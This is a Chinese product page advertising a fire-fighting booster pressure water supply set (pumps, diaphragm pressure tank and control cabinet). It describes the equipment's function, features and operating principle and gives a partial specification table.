Not available in Genesis!\n\n• 11\n\nLinear Strain Triangle (LST)\n\nThe displacement field in terms of generalized coordinates:\n\nwhich are quadratic in x and y.\n\nThe strain field:\n\nwhich are linear in x and y.\n\nContents: Plane Problems: Constitutive Equations; Plane Problems: Approximate Strain-Displacement Relations; Plane Problems: Strain-Displacement Relations; Plane Problems: Displacement Field Interpolated; Stiffness Matrix and strain energy; Important Note on interpolation (shape) functions; Loads and Boundary Conditions; Constant Strain Triangle (CST); Constant Strain Triangle (CST): Stiffness Matrix; Linear Strain Triangle (LST); Linear Strain Triangle (LST)" ]
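To make the CST stiffness-matrix slide concrete, the sketch below evaluates $k = B^T E B \, t A$ for a single constant strain triangle in plane stress using NumPy. It is not code from the original lecture notes; the nodal coordinates, Young's modulus, Poisson's ratio and thickness are assumed example values chosen only for illustration.

```python
import numpy as np

def cst_stiffness(xy, E_mod, nu, t):
    """Stiffness matrix k = B^T E B * t * A for a constant strain triangle (plane stress)."""
    (x1, y1), (x2, y2), (x3, y3) = xy
    # Twice the triangle area (positive if nodes 1-2-3 are numbered counterclockwise).
    two_A = (x2 - x1) * (y3 - y1) - (x3 - x1) * (y2 - y1)
    A = 0.5 * two_A
    # Strain-displacement matrix B (3x6), constant over the element.
    b1, b2, b3 = y2 - y3, y3 - y1, y1 - y2
    c1, c2, c3 = x3 - x2, x1 - x3, x2 - x1
    B = np.array([
        [b1, 0, b2, 0, b3, 0],
        [0, c1, 0, c2, 0, c3],
        [c1, b1, c2, b2, c3, b3],
    ]) / two_A
    # Plane-stress constitutive matrix E.
    E = (E_mod / (1 - nu**2)) * np.array([
        [1, nu, 0],
        [nu, 1, 0],
        [0, 0, (1 - nu) / 2],
    ])
    return B.T @ E @ B * t * A

if __name__ == "__main__":
    # Assumed example values: a right triangle, steel-like material, 10 mm thickness.
    k = cst_stiffness([(0.0, 0.0), (1.0, 0.0), (0.0, 1.0)], E_mod=200e9, nu=0.3, t=0.01)
    print(k.shape)              # (6, 6)
    print(np.allclose(k, k.T))  # True: the element stiffness matrix is symmetric
```

The symmetry check at the end reflects the fact that k comes from the quadratic strain-energy expression $U = \tfrac{1}{2} d^T k d$.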
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7563468,"math_prob":0.96203184,"size":3790,"snap":"2022-05-2022-21","text_gpt3_token_len":895,"char_repetition_ratio":0.16481775,"word_repetition_ratio":0.039783,"special_character_ratio":0.20422164,"punctuation_ratio":0.13808802,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9976771,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-23T10:54:13Z\",\"WARC-Record-ID\":\"<urn:uuid:c418120a-690d-42fa-9fe7-0fe2a8b830af>\",\"Content-Length\":\"93679\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:20ea042c-26a0-42b4-b890-14a55a436707>\",\"WARC-Concurrent-To\":\"<urn:uuid:23460956-0f29-45a6-ba42-86578719132d>\",\"WARC-IP-Address\":\"51.210.70.26\",\"WARC-Target-URI\":\"https://fdocument.org/document/plane-problems-constitutive-equations-ufl-plane-problems-constitutive-equations.html\",\"WARC-Payload-Digest\":\"sha1:PIZX5WAZPQKRCPK6UJ577DVO4ZF7X4SZ\",\"WARC-Block-Digest\":\"sha1:TKP3KDDJ5DSWRMDIGQTMFA37HUZLIIN2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662558015.52_warc_CC-MAIN-20220523101705-20220523131705-00586.warc.gz\"}"}
https://www.colorhexa.com/13606f
[ "# #13606f Color Information\n\nIn a RGB color space, hex #13606f is composed of 7.5% red, 37.6% green and 43.5% blue. Whereas in a CMYK color space, it is composed of 82.9% cyan, 13.5% magenta, 0% yellow and 56.5% black. It has a hue angle of 189.8 degrees, a saturation of 70.8% and a lightness of 25.5%. #13606f color hex could be obtained by blending #26c0de with #000000. Closest websafe color is: #006666.\n\n• R 7\n• G 38\n• B 44\nRGB color chart\n• C 83\n• M 14\n• Y 0\n• K 56\nCMYK color chart\n\n#13606f color description : Very dark cyan.\n\n# #13606f Color Conversion\n\nThe hexadecimal color #13606f has RGB values of R:19, G:96, B:111 and CMYK values of C:0.83, M:0.14, Y:0, K:0.56. Its decimal value is 1269871.\n\nHex triplet RGB Decimal 13606f `#13606f` 19, 96, 111 `rgb(19,96,111)` 7.5, 37.6, 43.5 `rgb(7.5%,37.6%,43.5%)` 83, 14, 0, 56 189.8°, 70.8, 25.5 `hsl(189.8,70.8%,25.5%)` 189.8°, 82.9, 43.5 006666 `#006666`\nCIE-LAB 37.209, -16.621, -14.921 7.32, 9.651, 16.515 0.219, 0.288, 9.651 37.209, 22.336, 221.915 37.209, -25.457, -18.164 31.066, -12.308, -9.773 00010011, 01100000, 01101111\n\n# Color Schemes with #13606f\n\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #6f2213\n``#6f2213` `rgb(111,34,19)``\nComplementary Color\n• #136f50\n``#136f50` `rgb(19,111,80)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #13326f\n``#13326f` `rgb(19,50,111)``\nAnalogous Color\n• #6f5013\n``#6f5013` `rgb(111,80,19)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #6f1332\n``#6f1332` `rgb(111,19,50)``\nSplit Complementary Color\n• #606f13\n``#606f13` `rgb(96,111,19)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #6f1360\n``#6f1360` `rgb(111,19,96)``\nTriadic Color\n• #136f22\n``#136f22` `rgb(19,111,34)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #6f1360\n``#6f1360` `rgb(111,19,96)``\n• #6f2213\n``#6f2213` `rgb(111,34,19)``\nTetradic Color\n• #08282e\n``#08282e` `rgb(8,40,46)``\n• #0c3a43\n``#0c3a43` `rgb(12,58,67)``\n• #0f4d59\n``#0f4d59` `rgb(15,77,89)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #177385\n``#177385` `rgb(23,115,133)``\n• #1a869b\n``#1a869b` `rgb(26,134,155)``\n• #1e98b0\n``#1e98b0` `rgb(30,152,176)``\nMonochromatic Color\n\n# Alternatives to #13606f\n\nBelow, you can see some colors close to #13606f. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #136f67\n``#136f67` `rgb(19,111,103)``\n• #136f6f\n``#136f6f` `rgb(19,111,111)``\n• #13686f\n``#13686f` `rgb(19,104,111)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #13586f\n``#13586f` `rgb(19,88,111)``\n• #13516f\n``#13516f` `rgb(19,81,111)``\n• #13496f\n``#13496f` `rgb(19,73,111)``\nSimilar Colors\n\n# #13606f Preview\n\nText with hexadecimal color #13606f\n\nThis text has a font color of #13606f.\n\n``<span style=\"color:#13606f;\">Text here</span>``\n#13606f background color\n\nThis paragraph has a background color of #13606f.\n\n``<p style=\"background-color:#13606f;\">Content here</p>``\n#13606f border color\n\nThis element has a border color of #13606f.\n\n``<div style=\"border:1px solid #13606f;\">Content here</div>``\nCSS codes\n``.text {color:#13606f;}``\n``.background {background-color:#13606f;}``\n``.border {border:1px solid #13606f;}``\n\n# Shades and Tints of #13606f\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #02090b is the darkest color, while #f9fdfe is the lightest one.\n\n• #02090b\n``#02090b` `rgb(2,9,11)``\n• #05181b\n``#05181b` `rgb(5,24,27)``\n• #08262c\n``#08262c` `rgb(8,38,44)``\n• #0a353d\n``#0a353d` `rgb(10,53,61)``\n• #0d434e\n``#0d434e` `rgb(13,67,78)``\n• #10525e\n``#10525e` `rgb(16,82,94)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #166e80\n``#166e80` `rgb(22,110,128)``\n• #197d90\n``#197d90` `rgb(25,125,144)``\n• #1c8ba1\n``#1c8ba1` `rgb(28,139,161)``\n• #1e9ab2\n``#1e9ab2` `rgb(30,154,178)``\n• #21a8c3\n``#21a8c3` `rgb(33,168,195)``\n• #24b7d3\n``#24b7d3` `rgb(36,183,211)``\nShade Color Variation\n• #30c0dc\n``#30c0dc` `rgb(48,192,220)``\n• #41c5de\n``#41c5de` `rgb(65,197,222)``\n• #51cae1\n``#51cae1` `rgb(81,202,225)``\n• #62cfe4\n``#62cfe4` `rgb(98,207,228)``\n• #73d4e7\n``#73d4e7` `rgb(115,212,231)``\n• #84d9ea\n``#84d9ea` `rgb(132,217,234)``\n• #94deed\n``#94deed` `rgb(148,222,237)``\n• #a5e3f0\n``#a5e3f0` `rgb(165,227,240)``\n• #b6e9f2\n``#b6e9f2` `rgb(182,233,242)``\n• #c7eef5\n``#c7eef5` `rgb(199,238,245)``\n• #d7f3f8\n``#d7f3f8` `rgb(215,243,248)``\n• #e8f8fb\n``#e8f8fb` `rgb(232,248,251)``\n• #f9fdfe\n``#f9fdfe` `rgb(249,253,254)``\nTint Color Variation\n\n# Tones of #13606f\n\nA tone is produced by adding gray to any pure hue. In this case, #404242 is the less saturated color, while #046a7e is the most saturated one.\n\n• #404242\n``#404242` `rgb(64,66,66)``\n• #3b4547\n``#3b4547` `rgb(59,69,71)``\n• #36484c\n``#36484c` `rgb(54,72,76)``\n• #314c51\n``#314c51` `rgb(49,76,81)``\n• #2c4f56\n``#2c4f56` `rgb(44,79,86)``\n• #27535b\n``#27535b` `rgb(39,83,91)``\n• #225660\n``#225660` `rgb(34,86,96)``\n• #1d5965\n``#1d5965` `rgb(29,89,101)``\n• #185d6a\n``#185d6a` `rgb(24,93,106)``\n• #13606f\n``#13606f` `rgb(19,96,111)``\n• #0e6374\n``#0e6374` `rgb(14,99,116)``\n• #096779\n``#096779` `rgb(9,103,121)``\n• #046a7e\n``#046a7e` `rgb(4,106,126)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #13606f is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
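The hex-to-RGB and HSL figures quoted above are easy to cross-check with Python's standard colorsys module. The snippet below is an independent sketch written for this page, not ColorHexa's own code, and it only reproduces the RGB decimal, RGB percent and HSL rows.

```python
import colorsys

hex_color = "13606f"
r, g, b = (int(hex_color[i:i + 2], 16) for i in (0, 2, 4))
print("RGB decimal:", r, g, b)                                     # 19 96 111
print("RGB percent: %.1f%% %.1f%% %.1f%%" % (r / 2.55, g / 2.55, b / 2.55))

# colorsys works on 0..1 floats and returns (hue, lightness, saturation).
h, l, s = colorsys.rgb_to_hls(r / 255, g / 255, b / 255)
print("HSL: %.1f deg, %.1f%%, %.1f%%" % (h * 360, s * 100, l * 100))  # ~189.8, 70.8, 25.5
```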
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5552349,"math_prob":0.8056518,"size":3689,"snap":"2021-04-2021-17","text_gpt3_token_len":1659,"char_repetition_ratio":0.12591587,"word_repetition_ratio":0.011090573,"special_character_ratio":0.56871784,"punctuation_ratio":0.23783186,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99129426,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-23T15:24:27Z\",\"WARC-Record-ID\":\"<urn:uuid:cd2253b1-f1c7-4dd9-830b-60b3f1336f38>\",\"Content-Length\":\"36267\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:034dfbc8-bc6e-472d-bf90-4a0a29404ca0>\",\"WARC-Concurrent-To\":\"<urn:uuid:142d6f8d-6bc8-4415-ae66-287ed85e51f7>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/13606f\",\"WARC-Payload-Digest\":\"sha1:VTH77ACQYPSLKX6LY6PUYIWYUZ2WNGDX\",\"WARC-Block-Digest\":\"sha1:RIOB3XBKDDCEZUTYYF6LSRA2EHUN7UPS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618039594808.94_warc_CC-MAIN-20210423131042-20210423161042-00102.warc.gz\"}"}
https://metanumbers.com/47255
[ "## 47255\n\n47,255 (forty-seven thousand two hundred fifty-five) is an odd five-digits composite number following 47254 and preceding 47256. In scientific notation, it is written as 4.7255 × 104. The sum of its digits is 23. It has a total of 3 prime factors and 8 positive divisors. There are 34,848 positive integers (up to 47255) that are relatively prime to 47255.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Odd\n• Number length 5\n• Sum of Digits 23\n• Digital Root 5\n\n## Name\n\nShort name 47 thousand 255 forty-seven thousand two hundred fifty-five\n\n## Notation\n\nScientific notation 4.7255 × 104 47.255 × 103\n\n## Prime Factorization of 47255\n\nPrime Factorization 5 × 13 × 727\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 3 Total number of distinct prime factors Ω(n) 3 Total number of prime factors rad(n) 47255 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) -1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 47,255 is 5 × 13 × 727. Since it has a total of 3 prime factors, 47,255 is a composite number.\n\n## Divisors of 47255\n\n1, 5, 13, 65, 727, 3635, 9451, 47255\n\n8 divisors\n\n Even divisors 0 8 4 4\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 8 Total number of the positive divisors of n σ(n) 61152 Sum of all the positive divisors of n s(n) 13897 Sum of the proper positive divisors of n A(n) 7644 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 217.382 Returns the nth root of the product of n divisors H(n) 6.18197 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 47,255 can be divided by 8 positive divisors (out of which 0 are even, and 8 are odd). The sum of these divisors (counting 47,255) is 61,152, the average is 7,644.\n\n## Other Arithmetic Functions (n = 47255)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 34848 Total number of positive integers not greater than n that are coprime to n λ(n) 1452 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 4877 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 34,848 positive integers (less than 47,255) that are coprime with 47,255. 
And there are approximately 4,877 prime numbers less than or equal to 47,255.\n\n## Divisibility of 47255\n\n m n mod m 2 3 4 5 6 7 8 9 1 2 3 0 5 5 7 5\n\nThe number 47,255 is divisible by 5.\n\n## Classification of 47255\n\n• Arithmetic\n• Deficient\n\n• Polite\n\n• Square Free\n\n### Other numbers\n\n• LucasCarmichael\n• Sphenic\n\n## Base conversion (47255)\n\nBase System Value\n2 Binary 1011100010010111\n3 Ternary 2101211012\n4 Quaternary 23202113\n5 Quinary 3003010\n6 Senary 1002435\n8 Octal 134227\n10 Decimal 47255\n12 Duodecimal 2341b\n20 Vigesimal 5i2f\n36 Base36 10gn\n\n## Basic calculations (n = 47255)\n\n### Multiplication\n\nn×i\n n×2 94510 141765 189020 236275\n\n### Division\n\nni\n n⁄2 23627.5 15751.7 11813.8 9451\n\n### Exponentiation\n\nni\n n2 2233035025 105522070106375 4986445422876750625 235634478458040850784375\n\n### Nth Root\n\ni√n\n 2√n 217.382 36.1534 14.7439 8.60775\n\n## 47255 as geometric shapes\n\n### Circle\n\n Diameter 94510 296912 7.01529e+09\n\n### Sphere\n\n Volume 4.4201e+14 2.80611e+10 296912\n\n### Square\n\nLength = n\n Perimeter 189020 2.23304e+09 66828.7\n\n### Cube\n\nLength = n\n Surface area 1.33982e+10 1.05522e+14 81848.1\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 141765 9.66933e+08 40924\n\n### Triangular Pyramid\n\nLength = n\n Surface area 3.86773e+09 1.24359e+13 38583.5" ]
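The quantities above all follow from the prime factorisation 5 × 13 × 727. The snippet below is a small self-contained cross-check (not code from metanumbers.com); it uses plain trial division, which is more than fast enough for a five-digit number.

```python
def prime_factors(n):
    """Return the prime factorisation of n as a list of (prime, exponent) pairs."""
    factors, p = [], 2
    while p * p <= n:
        if n % p == 0:
            e = 0
            while n % p == 0:
                n //= p
                e += 1
            factors.append((p, e))
        p += 1
    if n > 1:
        factors.append((n, 1))
    return factors

n = 47255
facts = prime_factors(n)
print(facts)                     # [(5, 1), (13, 1), (727, 1)]

divisors = sorted(d for d in range(1, n + 1) if n % d == 0)
print(divisors)                  # [1, 5, 13, 65, 727, 3635, 9451, 47255]
print(sum(divisors))             # 61152  (sigma, the sum of divisors)

phi = n
for p, _ in facts:
    phi = phi // p * (p - 1)
print(phi)                       # 34848  (Euler totient)
```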
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6342608,"math_prob":0.98890483,"size":4543,"snap":"2020-24-2020-29","text_gpt3_token_len":1598,"char_repetition_ratio":0.11874862,"word_repetition_ratio":0.028106509,"special_character_ratio":0.45124367,"punctuation_ratio":0.0749354,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9985833,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-09T04:37:01Z\",\"WARC-Record-ID\":\"<urn:uuid:b4b23543-2d8c-48f8-81af-803c47537075>\",\"Content-Length\":\"48320\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3aacceba-b419-4aa5-9ba8-424d77f7c07a>\",\"WARC-Concurrent-To\":\"<urn:uuid:395d77fc-b26c-4a99-ae2e-cf74084a4e8f>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/47255\",\"WARC-Payload-Digest\":\"sha1:KVSKE4Y3KGD23YV2OW2BGRQHQ2JJI3JA\",\"WARC-Block-Digest\":\"sha1:CSKOJ7GGW2B2YXLOBOUNOJYSB5HIZQA3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655898347.42_warc_CC-MAIN-20200709034306-20200709064306-00440.warc.gz\"}"}
http://forums.wolfram.com/mathgroup/archive/2001/May/msg00327.html
[ "", null, "", null, "", null, "", null, "", null, "", null, "", null, "MatrixPower[]\n\n• To: mathgroup at smc.vnet.net\n• Subject: [mg28919] MatrixPower[]\n• From: Konstantin L Kouptsov <klk206 at nyu.edu>\n• Date: Fri, 18 May 2001 01:13:26 -0400 (EDT)\n• Organization: New York University\n• Sender: owner-wri-mathgroup at wolfram.com\n\n```Hello, Mathgroup,\n\nI needed to calculate the n-th power of a given matrix M.\nUsually it can be done with the MatrixPower[M,n] function.\nBut for the symbolic power it becomes a bit tricky.\n\nTake M={{1,1,1},{0,1,0},{1,1,1}},\nthen\nMatrixPower[M,n] gives\n{{2^(-1+n),-1+2^n,2^(-1+n)},\n{0, 1,0},\n{2^(-1+ n),-1+2^n,2^(-1+n)}}\n\nNow, if you change the matrix to\nM={{1,1,1},{0,2,0},{1,1,1}}, then the MatrixPower function\ngives an error\n\nMatrixPower::\"zvec\": \"Cannot compute MatrixPower because the\nargument has a zero eigenvector.\"\n\nwhich seems irrelevant, since the power of a square matrix always\nexist.\n\nThe reason for this error is in the way Mathematica calculates the\npower. Here is the explicit form of the used algorithm\n\n{eval, evec} = Eigensystem[M0];\ns = Transpose[evec];\nA = DiagonalMatrix[eval];\nM[n_] := s.MatrixPower[A, n].Inverse[s]\n\nwhich of course does not work if s has no inverse.\n\nTo circumvent the problem one can use the Hamilton-Cailey theorem\n(which can be found in the Korn,Korn mathematical handbook).\nThe theorem gives a recipe to calculate any function of a matrix\nusing Vandermonde matrix built on its eigenvalues and a finite\nnumber of powers of the matrix itself.\n\nBelow is the implementation of this theorem. There is one thing to watch\nout: it the matrix has equal eigenvalues, the Vandermonde matrix is\nzero, so you get indeterminate 0/0. The way the theorem can be applied\nis that you can resolve indeterminancy\nby cancelling out zeroes in numerator and denominator, as in\n\n(2-2)(7-5) 1\n__________ = _\n\n(2-2)(9-3) 3\n\nwhich must be done in mathematically correct way (remember calculus?)\n\nI used the function ReplaceEqual[] to discern the similar eigevalues\nin the following manner:\n\nReplaceEqual[{1,1,2,3,4,4,5}] gives\n\n{{1,1+i1,2,3,4,4+i2,5},{i1,i2}}\n\ni.e. shift similar eigenvalues to make them different, and at the end\ncalculate the result by setting i1,i2 to zero. This is done by the following\ncode\n\nReplaceEqual[x_List] := Module[{i = 1, a, k, ls1 = {}, ls2, s, x1},\nx1 = Sort[x]; a = First[x1]; ls2 = List[a];\nFor[k = 2, k <= Length[x1], k++,\nIf[x1[[k]] == a,\ns = ToExpression[\"i\" <> ToString[i++]];\nAppendTo[ls2, x1[[k]] + s]; AppendTo[ls1, s],\nAppendTo[ls2, x1[[k]]]; a = x1[[k]]\n]\n];\n{ls2, ls1}\n]\n\nNow the Vandermonde matrix determinant can be calculated in a rather\nefficient way\n\nVandermondeMatrix[eval_List] := Module[{x, y},\nx = Table[1, {Length[eval]}];\ny = (eval^# &) /@ Range[1, Length[eval] - 1];\nPrependTo[y, x]\n]\n\nbut we also need the determinant of the Vandermonde matrix with one of\nthe columns replaced by {F[eval[]],F[eval[]],...}\n\nVandermondeMatrixReplaced[eval_List,f_, n_] := Module[{w, fs},\nw = VandermondeMatrix[eval]; (* or pull this call out for efficiency *)\nfs = Map[f, eval];\nReplacePart[w, fs, n]\n]\n\nCalculation of this deteminant was a problem which caused my recent messages to\nMathGroup. Rasmus Debitsch have suggested using the row echelon form\nof the matrix. 
For smaller matrices simple Det[] works.\n\nFinally we arrive at the HamiltonCailey[] function which computes any\nfunction of a square matrix:\n\nHamiltonCailey[A_, F_] := Module[{eig, n, w, wr, x},\n{eig, vars} = ReplaceEqual[Eigenvalues[A]];\nn = Length[A]; (* dimension of the n x n matrix A *)\nw = VandermondeMatrix[eig];\nwr = (1/Det[w]) Sum[\nDet[VandermondeMatrixReplaced[eig, F, n - k + 1]]*\nMatrixPower[A, n - k], {k, 1, n}]\n]\n\nDo not forget to apply the Limit[] to the result. There is still a lot\nto be said about the above method, but you get the idea.\n\nFor the matrix in the above example\nM={{1,1,1},{0,2,0},{1,1,1}}\nyou write\n\nLimit[HamiltonCailey[M,#^n&]//Simplify,i1->0]\n\n{{2^(-1+n),n 2^(-1+n),2^(-1+n)},\n{0,2^n,0},\n{2^(-1+n),n 2^(-1+n),2^(-1+n)}}\n\nKonstantin.\n\nPS. I wish to thank Rasmus Debitsch and all who responded to my post.\n\n```\n\n• Prev by Date: Re: Creating graph with only a few data points\n• Next by Date: Request for contour plotting algorithm\n• Previous by thread: Re: Creating graph with only a few data points\n• Next by thread: Re: MatrixPower[]" ]
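As a quick sanity check of the closed form quoted at the end of the post, the sketch below (in Python rather than the Wolfram Language used in the thread) compares M^n computed by repeated multiplication against {{2^(n-1), n 2^(n-1), 2^(n-1)}, {0, 2^n, 0}, {2^(n-1), n 2^(n-1), 2^(n-1)}} for small n. The matrix is the one from the post; it is defective (the repeated eigenvalue 2 has only a one-dimensional eigenspace), which is exactly why the naive eigenvector-based route fails.

```python
import numpy as np

# The matrix from the post for which eigendecomposition-based MatrixPower fails.
M = np.array([[1, 1, 1],
              [0, 2, 0],
              [1, 1, 1]])

def closed_form(n):
    """Closed form for M^n quoted at the end of the post (valid for n >= 1)."""
    return np.array([
        [2**(n - 1), n * 2**(n - 1), 2**(n - 1)],
        [0,          2**n,           0],
        [2**(n - 1), n * 2**(n - 1), 2**(n - 1)],
    ])

power = M.copy()
for n in range(1, 11):
    assert np.array_equal(power, closed_form(n)), f"mismatch at n={n}"
    power = power @ M  # build M^(n+1) by repeated multiplication

print("Closed form matches M^n for n = 1..10")
```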
[ null, "http://forums.wolfram.com/mathgroup/images/head_mathgroup.gif", null, "http://forums.wolfram.com/mathgroup/images/head_archive.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/2.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/1.gif", null, "http://forums.wolfram.com/mathgroup/images/search_archive.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6977725,"math_prob":0.998604,"size":4108,"snap":"2019-26-2019-30","text_gpt3_token_len":1275,"char_repetition_ratio":0.12207603,"word_repetition_ratio":0.0,"special_character_ratio":0.33057448,"punctuation_ratio":0.2054054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9992662,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-16T11:55:36Z\",\"WARC-Record-ID\":\"<urn:uuid:46e2e775-75db-40a7-8444-47577213d747>\",\"Content-Length\":\"45409\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b94f617d-a575-4e8f-8701-66446ae41d73>\",\"WARC-Concurrent-To\":\"<urn:uuid:a33ec16b-7830-4d85-9d34-1d442d5ec1bb>\",\"WARC-IP-Address\":\"140.177.205.73\",\"WARC-Target-URI\":\"http://forums.wolfram.com/mathgroup/archive/2001/May/msg00327.html\",\"WARC-Payload-Digest\":\"sha1:6O735JM4WELB2TKROOKSPYYD7MSCHRHS\",\"WARC-Block-Digest\":\"sha1:5UZ36RHIUCRPH3EHCYSTH3XAHPD52ICS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998100.52_warc_CC-MAIN-20190616102719-20190616124719-00536.warc.gz\"}"}
http://www.xzqpv.com/products/2034.html
[ "### 立即咨询", null, "### 产品展示", null, "", null, "", null, "• 上海喜之泉下置式XZQ消防稳压给水设备,立式增压稳压设备,消防泵供水设备,消防泵\n• 额定容量: 10-1000(L)\n额定输出功率: 1.5(kw)\n电压: 380(V)\n• 点击:401\n\n消防自动增压稳压给水成套设备是为消防灭火工程配套的设备,主要作用:保持水灭火管网的消防压力,发生火警打开水灭火设备能立即喷出充实水柱,给报警联动启动大消防泵赢得30秒以上的初期灭火扑救时间,直至消防主泵全负荷启动进行,由于该设备能始终保持管网压力,使管网不存空气启动大消防泵不打呛管网无颤动危险。并获得消防产品3CF认证证书。", null, "", null, "", null, "", null, "1、泵、电控柜、隔膜式气压罐、组合管网四位一体,并配带有隔振器,无需预埋地脚孔,设计人员只需算好参数即可查得设备型号、基础尺寸等。电气设计人员无需再进行控制线路设计,只设计泵房内进线和到设备的走线。选用方便,可大大缩短设计人员的设计周期和施工人员的施工时间。\n\n2、隔膜式气压罐一次性充气持久耐用,水气隔离能预防水质的污染。\n\n3、设备占地面积小,投资省,全自动运行,无需专人看管。\n\n4、设备有双电源接口,双路电源自动(手动)切换,设备可根据设计要求制作。\n\n5、具有自动保护及故障切换功能。任何一台水泵发生故障(电气故障或水力故障)均能启动备用泵。\n6、可与消防中心连接(根据设计需要)。\n7、可以根据客户的需要选择罐、稳压方式、控制功能。\n8、电气主要元气件采用国产或企业产品,质量可靠、运行稳定\n\nZW(L、W)本设备根据建设部标准图集98S205基础的性能参数做为参考,推出了两种设备型号,①ZW(L)、ZW(W)系列稳压按照建设部图集98S205图集号所设计的型号;②企业根据消防GA30-92、GA30-2002相关标准及给水设备标准规范编制的设备型号。在这里删除了稳压罐、水泵的垄断性型号,给设计及用户一个产品选择的竞争空间。本公司唐纯虎为您推荐以下型号产品使用,如:LG、GDL、CDL、ISG等型号。用户可以根据水位水箱间的位置选择合适的设备。\n\n该设备由稳压泵两台(根据设计要求可设一台)为一用一备,隔膜式稳压罐一台,电控柜一台,仪表阀门及组合管网各一套,组成了隔膜式稳压供水设备。\n\n1、工业、民用建筑的消防、喷淋和稳压给水;\n2、暖通、空调、锅炉的定压补水;\n3、隐蔽工程、临时建筑和小型工矿,偏远地区的生活给水\n\n隔膜式气压给水设备,一次充气,常年运行使用。工作时起动补水泵,水室进水,水压升高,气室的气体被压缩隔膜伸长;当水压下降时,气室气体膨胀,隔膜收缩,压迫水室出水。这样周而复始,通过电接点压力表和电控箱控制水泵运行,达到额定的压力和连续供水。\n\n 序号 增压稳压设备型号 消防压力(Mpa)P1 立式隔膜式气压罐 配用水泵 运行压力 (Mpa) 稳压水容积(L) 型号规格 工作压力比αb 消防储水容积(L) 型 号 标定容积 实际容积 1 ZW(L)-1-X-7 0.10 XQG800×0.6 0.60 300 319 25LG3-10×4 N=1.5kw P1=0.10 PS1=0.26 P1=0.23 PS2=0.31 54 2 ZW(L)-1-Z-10 0.16 XQG800×0.6 0.80 150 159 25LG3-10×4 N=1.5kw P1=0.16 PS1=0.26 P1=0.23 PS2=0.36 70 3 ZW(L)-1-X-10 0.16 XQG800×0.6 0.60 300 319 25LG3-10×5 N=1.5kw P1=0.16 PS1=0.36 P1=0.33 